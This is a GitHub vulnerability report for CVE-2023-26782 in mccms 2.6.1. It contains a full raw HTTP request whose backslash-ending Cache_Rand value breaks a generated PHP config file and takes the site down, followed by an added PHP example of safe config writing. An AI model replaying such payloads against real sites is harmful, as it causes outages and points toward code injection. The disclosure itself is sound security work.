CVE-2023-26782: There is a denial of service vulnerability in your project · Issue #2 · chshcms/mccms

An issue discovered in mccms 2.6.1 allows remote attackers to cause a denial of service via Backend management interface ->System Configuration->Cache Configuration->Cache security characters.


Hello, we found that your project has a denial of service vulnerability. Details are as follows.

  1. Vulnerability Function Point
    The function point exists in Backend management interface ->System Configuration->Cache Configuration->Cache security characters

  2. Vulnerability details
    HTTP raw packet

POST /admin.php/setting/cache_save HTTP/1.1
Host: 172.20.10.3:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 297
Origin: http://172.20.10.3:81
Connection: close
Referer: http://172.20.10.3:81/admin.php/setting/cache
Cookie: mc_admin_id=972crMx4oruLsvSMuCQXg89E59IOc1gCMu4UbgT2; mc_admin_nichen=60e3ZaYNY8XyAN56ivxQjLyJIwtpFNMFPD2rXUJoIUJazlazXN4; mc_admin_login=89f0uw62E0x-cUBqH1lgtD4EbEsdytBZGLWhBDRRiwv2iT0vaJpingm4ylkt8PD4ndhPfLzwoCgMerpjnw

Cache_Mode=0&Cache_Rand=ygmjqw7jpia4aughbhj%5C&Cache_Mem_Ip=127.0.0.1a%2F%2F%2F%E9%8E%88'%22%5C(&Cache_Mem_Port=11211&Cache_Mem_Pass=()&Cache_Redis_Ip=127.0.0.1&Cache_Redis_Port=6379&Cache_Redis_Pass=()&Cache_Time_Index=1800&Cache_Time_List=3600&Cache_Time_Show=1&Cache_Time_Pic=3600&Cache_Time=72

When I add the “\” character after the Cache_Rand parameter, it can cause the site to not work properly. As you can see in the screenshot below, when you visit the website now, the response status code is already 500 and the website is no longer working properly.

  3. Code audit
    According to the function route, we can locate the “sys/apps/controllers/admin/Setting.php” file. Based on the function route, we can locate the cache_save function in the sys/apps/controllers/admin/Setting.php file. The Cache_Rand parameter passed in by the user is written to the cache.php file.

Then we open the “sys/libs/cache.php” file. You can see that the “\” symbol is used as an escape character to escape the “’” symbol.
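
The failure mode reported in this issue, as an added PHP example (not mccms code and not part of the original report): a submitted value pasted unescaped between single quotes in a generated config file, next to a writer that uses var_export() and parses the result before replacing the live file. The define() layout, the file path and all function names are assumptions.

```php
<?php
// Added illustration, not mccms code. The define() layout and every function
// name here are assumptions made for the example.

// Weak pattern: the submitted value is pasted between single quotes as-is.
function render_config_unsafe(string $rand): string
{
    return "<?php\ndefine('Cache_Rand','" . $rand . "');\n";
}

// Hardened: var_export() emits a correctly escaped PHP string literal.
function render_config_safe(string $rand): string
{
    return "<?php\ndefine('Cache_Rand'," . var_export($rand, true) . ");\n";
}

// True when $source is syntactically valid PHP (TOKEN_PARSE throws otherwise).
function parses(string $source): bool
{
    try {
        token_get_all($source, TOKEN_PARSE);
        return true;
    } catch (ParseError $e) {
        return false;
    }
}

// Replace the live file only with source that parses, via a temp file + rename.
function save_config(string $path, string $source): bool
{
    if (!parses($source)) {
        return false; // the previous, working file stays in place
    }
    $tmp = $path . '.tmp';
    return file_put_contents($tmp, $source, LOCK_EX) !== false && rename($tmp, $path);
}

// The Cache_Rand value from the request above: it ends in a single backslash.
$value = 'ygmjqw7jpia4aughbhj\\';
$path  = sys_get_temp_dir() . '/cache_example.php'; // constructed path

foreach (['unsafe' => render_config_unsafe($value), 'safe' => render_config_safe($value)] as $name => $src) {
    printf("%-6s parses=%s saved=%s\n", $name, var_export(parses($src), true), var_export(save_config($path, $src), true));
}
```

An allow-list on the field at the controller (for example letters and digits only) is a reasonable additional check before the value reaches the writer.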
